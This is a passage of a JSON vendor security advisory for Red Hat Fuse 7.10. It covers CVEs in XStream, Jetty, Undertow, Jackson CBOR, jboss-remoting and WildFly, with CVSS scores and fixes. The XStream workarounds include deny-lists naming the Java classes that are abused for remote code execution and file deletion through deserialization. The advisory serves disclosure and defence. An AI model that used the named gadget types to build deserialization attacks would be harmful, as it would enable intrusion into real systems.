unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {\n throw new ConversionException(\"Unsupported type due to security reasons.\");\n }\n\n public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {\n throw new ConversionException(\"Unsupported type due to security reasons.\");\n }\n}, XStream.PRIORITY_LOW);\n```", "product_ids": [ "Red Hat Fuse 7.10" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.0, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "XStream: remote code execution due to insecure XML deserialization when relying on blocklists" }, { "cve": "CVE-2020-26259", "cwe": { "id": "CWE-78", "name": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)" }, "discovery_date": "2020-12-16T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1908837" } ], "notes": [ { "category": "description", "text": "XStream is a Java library to serialize objects to XML and back again. XStream before version 1.4.15 is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling. The vulnerability may allow a remote attacker to delete arbitrary known files on the host as long as the executing process has sufficient rights only by manipulating the processed input stream. If you rely on XStream\u0027s default blacklist of the Security Framework, you will have to use at least version 1.4.15. The reported vulnerability does not exist running Java 15 or higher. 
No user is affected, who followed the recommendation to set up XStream\u0027s Security Framework with a whitelist! Anyone relying on XStream\u0027s default blacklist can immediately switch to a whitelist for the allowed types to avoid the vulnerability. Users of XStream 1.4.14 or below who still want to use XStream default blacklist can use a workaround described in more detail in the referenced advisories.", "title": "Vulnerability description" }, { "category": "summary", "text": "XStream: arbitrary file deletion on the local host when unmarshalling", "title": "Vulnerability summary" }, { "category": "other", "text": "OpenShift Container Platform (OCP) delivers jenkins package with bundled XStream library. Due to JEP-200 Jenkins project [1] and advisory SECURITY-383 [2], OCP jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://www.jenkins.io/security/advisory/2017-02-01/ (see SECURITY-383 / CVE-2017-2608)", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-26259" }, { "category": "external", "summary": "RHBZ#1908837", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1908837" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-26259", "url": "https://www.cve.org/CVERecord?id=CVE-2020-26259" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-26259", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26259" } ], "release_date": "2020-12-13T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", 
"date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" }, { "category": "workaround", "details": "As recommended, use XStream\u0027s security framework to implement a whitelist for the allowed types.\n\nUsers of XStream 1.4.14 who insist to use XStream default blacklist - despite that clear recommendation - can simply add two lines to XStream\u0027s setup code:\n\nxstream.denyTypes(new String[]{ \"jdk.nashorn.internal.objects.NativeString\" });\nxstream.denyTypesByRegExp(new String[]{ \".*\\\\.ReadAllStream\\\\$FileStream\" });\n\nUsers of XStream 1.4.13 who want to use XStream default blacklist can simply add three lines to XStream\u0027s setup code:\n\nxstream.denyTypes(new String[]{ \"javax.imageio.ImageIO$ContainsFilter\", \"jdk.nashorn.internal.objects.NativeString\" });\nxstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });\nxstream.denyTypesByRegExp(new String[]{ \".*\\\\.ReadAllStream\\\\$FileStream\" });\n\nUsers of XStream 1.4.12 to 1.4.7 who want to use XStream with a blacklist will have to setup such a list from scratch and deny at least the following types: javax.imageio.ImageIO$ContainsFilter, java.beans.EventHandler, java.lang.ProcessBuilder, jdk.nashorn.internal.objects.NativeString, java.lang.Void and void and deny several types by name pattern.\n\nxstream.denyTypes(new String[]{ \"javax.imageio.ImageIO$ContainsFilter\", \"jdk.nashorn.internal.objects.NativeString\" });\nxstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, 
java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });\nxstream.denyTypesByRegExp(new String[]{ \".*\\\\$LazyIterator\", \"javax\\\\.crypto\\\\..*\", \".*\\\\.ReadAllStream\\\\$FileStream\" });\n\nUsers of XStream 1.4.6 or below can register their own converter to prevent the unmarshalling of the currently known critical types of the Java runtime. It is in fact an updated version of the workaround for CVE-2013-7285:\n\nxstream.registerConverter(new Converter() {\n public boolean canConvert(Class type) {\n return type != null \u0026\u0026 (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class\n || type.getName().equals(\"javax.imageio.ImageIO$ContainsFilter\") || type.getName().equals(\"jdk.nashorn.internal.objects.NativeString\")\n || type == java.lang.Void.class || type == void.class || Proxy.isProxy(type)\n || type.getName().startsWith(\"javax.crypto.\") || type.getName().endsWith(\"$LazyIterator\") || type.getName().endsWith(\".ReadAllStream$FileStream\"));\n }\n\n public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {\n throw new ConversionException(\"Unsupported type due to security reasons.\");\n }\n\n public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {\n throw new ConversionException(\"Unsupported type due to security reasons.\");\n }\n}, XStream.PRIORITY_LOW);", "product_ids": [ "Red Hat Fuse 7.10" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "XStream: arbitrary file deletion on the local host when 
unmarshalling" }, { "cve": "CVE-2020-27218", "cwe": { "id": "CWE-226", "name": "Sensitive Information in Resource Not Removed Before Reuse" }, "discovery_date": "2020-11-28T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1902826" } ], "notes": [ { "category": "description", "text": "In Eclipse Jetty version 9.4.0.RC0 to 9.4.34.v20201102, 10.0.0.alpha0 to 10.0.0.beta2, and 11.0.0.alpha0 to 11.0.0.beta2, if GZIP request body inflation is enabled and requests from different clients are multiplexed onto a single connection, and if an attacker can send a request with a body that is received entirely but not consumed by the application, then a subsequent request on the same connection will see that body prepended to its body. The attacker will not see any data but may inject data into the body of the subsequent request.", "title": "Vulnerability description" }, { "category": "summary", "text": "jetty: buffer not correctly recycled in Gzip Request inflation", "title": "Vulnerability summary" }, { "category": "other", "text": "In OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack, ship the vulnerable version of jetty.\nSince the release of OCP 4.6, the Metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-27218" 
}, { "category": "external", "summary": "RHBZ#1902826", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1902826" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-27218", "url": "https://www.cve.org/CVERecord?id=CVE-2020-27218" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-27218", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27218" }, { "category": "external", "summary": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-86wm-rrjm-8wh8", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-86wm-rrjm-8wh8" } ], "release_date": "2020-11-27T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "jetty: buffer not correctly recycled in Gzip Request inflation" }, { "cve": "CVE-2020-27223", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-02-26T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": 
"1934116" } ], "notes": [ { "category": "description", "text": "In Eclipse Jetty 9.4.6.v20170531 to 9.4.36.v20210114 (inclusive), 10.0.0, and 11.0.0 when Jetty handles a request containing multiple Accept headers with a large number of \u201cquality\u201d (i.e. q) parameters, the server may enter a denial of service (DoS) state due to high CPU usage processing those quality values, resulting in minutes of CPU time exhausted processing those quality values.", "title": "Vulnerability description" }, { "category": "summary", "text": "jetty: request containing multiple Accept headers with a large number of \"quality\" parameters may lead to DoS", "title": "Vulnerability summary" }, { "category": "other", "text": "In OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack, ship the vulnerable version of jetty.\nSince the release of OCP 4.6, the Metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-27223" }, { "category": "external", "summary": "RHBZ#1934116", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1934116" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-27223", "url": "https://www.cve.org/CVERecord?id=CVE-2020-27223" }, { "category": "external", "summary": 
"https://nvd.nist.gov/vuln/detail/CVE-2020-27223", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27223" }, { "category": "external", "summary": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-m394-8rww-3jr7", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-m394-8rww-3jr7" } ], "release_date": "2021-02-26T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "jetty: request containing multiple Accept headers with a large number of \"quality\" parameters may lead to DoS" }, { "cve": "CVE-2020-27782", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2020-11-24T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1901304" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Undertow AJP connector. 
Malicious requests and abrupt connection closes could be triggered by an attacker using query strings with non-RFC compliant characters resulting in a denial of service. The highest threat from this vulnerability is to system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "undertow: special character in query results in server errors", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-27782" }, { "category": "external", "summary": "RHBZ#1901304", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1901304" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-27782", "url": "https://www.cve.org/CVERecord?id=CVE-2020-27782" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-27782", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27782" } ], "release_date": "2021-01-25T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" }, { "category": "workaround", "details": "The issue can be mitigated by using HTTP/1.1 instead of AJP 
to proxy to the back-end.", "product_ids": [ "Red Hat Fuse 7.10" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "undertow: special character in query results in server errors" }, { "cve": "CVE-2020-28491", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-02-18T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1930423" } ], "notes": [ { "category": "description", "text": "This affects the package com.fasterxml.jackson.dataformat:jackson-dataformat-cbor from 0 and before 2.11.4, from 2.12.0-rc1 and before 2.12.1. 
Unchecked allocation of byte buffer can cause a java.lang.OutOfMemoryError exception.", "title": "Vulnerability description" }, { "category": "summary", "text": "jackson-dataformat-cbor: Unchecked allocation of byte buffer can cause a java.lang.OutOfMemoryError exception", "title": "Vulnerability summary" }, { "category": "other", "text": "In OpenShift Container Platform (OCP), the hive/presto/hadoop components that comprise the OCP metering stack, ship the vulnerable version of jackson-dataformat-cbor.\nSince the release of OCP 4.6, the metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.\n\nIn OCP 4.6 the openshift4/ose-logging-elasticsearch6 container delivers the vulnerable version of jackson-dataformat-cbor, but OCP 4.6 is Out Of Support Scope (OOSS) for Moderate and Low impact vulnerabilities because it is now in the Maintenance Phase of the support, hence this component is marked as ooss. Since the release of OCP 4.7 this component is delivered as part of the OpenShift Logging product (openshift-logging/elasticsearch6-rhel8 container).\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-28491" }, { "category": "external", "summary": "RHBZ#1930423", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1930423" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-28491", "url": 
"https://www.cve.org/CVERecord?id=CVE-2020-28491" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-28491", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28491" }, { "category": "external", "summary": "https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONDATAFORMAT-1047329", "url": "https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONDATAFORMAT-1047329" } ], "release_date": "2021-02-18T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "jackson-dataformat-cbor: Unchecked allocation of byte buffer can cause a java.lang.OutOfMemoryError exception" }, { "cve": "CVE-2020-35510", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2020-12-01T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1905796" } ], "notes": [ { "category": "description", "text": "A flaw was found in jboss-remoting. 
A malicious attacker could cause threads to hold up forever in the EJB server by writing a sequence of bytes corresponding to the expected messages of a successful EJB client request, but omitting the ACK messages, or just tamper with jboss-remoting code, deleting the lines that send the ACK message from the EJB client code resulting in a denial of service. The highest threat from this vulnerability is to system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "jboss-remoting: Threads hold up forever in the EJB server by suppressing the ack from an EJB client", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-35510" }, { "category": "external", "summary": "RHBZ#1905796", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1905796" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-35510", "url": "https://www.cve.org/CVERecord?id=CVE-2020-35510" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-35510", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35510" } ], "release_date": "2020-12-09T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": 
[ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "jboss-remoting: Threads hold up forever in the EJB server by suppressing the ack from an EJB client" }, { "acknowledgments": [ { "names": [ "Damian Bury" ] } ], "cve": "CVE-2021-3536", "cwe": { "id": "CWE-79", "name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)" }, "discovery_date": "2021-02-12T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1948001" } ], "notes": [ { "category": "description", "text": "A flaw was found in Wildfly. While creating a new role in the domain mode via the admin console, it is possible to add a payload in the name field, leading to a Cross-site scripting attack (XSS). The highest threat from this vulnerability is to confidentiality and integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "wildfly: XSS via admin console when creating roles in domain mode", "title": "Vulnerability summary" }, { "category": "other", "text": "This flaw does not affect Red Hat CodeReady Studio 12 because it uses the Wildfly client only. 
The domain mode is not used.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-3536" }, { "category": "external", "summary": "RHBZ#1948001", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1948001" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-3536", "url": "https://www.cve.org/CVERecord?id=CVE-2021-3536" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-3536", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3536" } ], "release_date": "2021-04-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", 
"details": "Low" } ], "title": "wildfly: XSS via admin console when creating roles in domain mode" }, { "cve": "CVE-2021-3597", "cwe": { "id": "CWE-362", "name": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)" }, "discovery_date": "2021-02-06T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1970930" } ], "notes": [ { "category": "description", "text": "A flaw was found in undertow. The HTTP2SourceChannel fails to write the final frame under some circumstances, resulting in a denial of service. The highest threat from this vulnerability is availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "undertow: HTTP2SourceChannel fails to write final frame under some circumstances may lead to DoS", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat OpenStack Platform\u0027s OpenDaylight will not be updated for this flaw because it was deprecated as of OpenStack Platform 14 and is only receiving security fixes for Important and Critical flaws.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-3597" }, { "category": "external", "summary": "RHBZ#1970930", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1970930" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-3597", "url": "https://www.cve.org/CVERecord?id=CVE-2021-3597" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-3597", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3597" } ], 
"release_date": "2021-06-11T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "undertow: HTTP2SourceChannel fails to write final frame under some circumstances may lead to DoS" }, { "cve": "CVE-2021-3629", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-04-06T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1977362" } ], "notes": [ { "category": "description", "text": "A flaw was found in Undertow. A potential security issue in flow control handling by the browser over http/2 may potentially cause overhead or a denial of service in the server. 
The highest threat from this vulnerability is availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "undertow: potential security issue in flow control over HTTP/2 may lead to DOS", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-3629" }, { "category": "external", "summary": "RHBZ#1977362", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1977362" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-3629", "url": "https://www.cve.org/CVERecord?id=CVE-2021-3629" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-3629", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3629" } ], "release_date": "2021-03-29T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": 
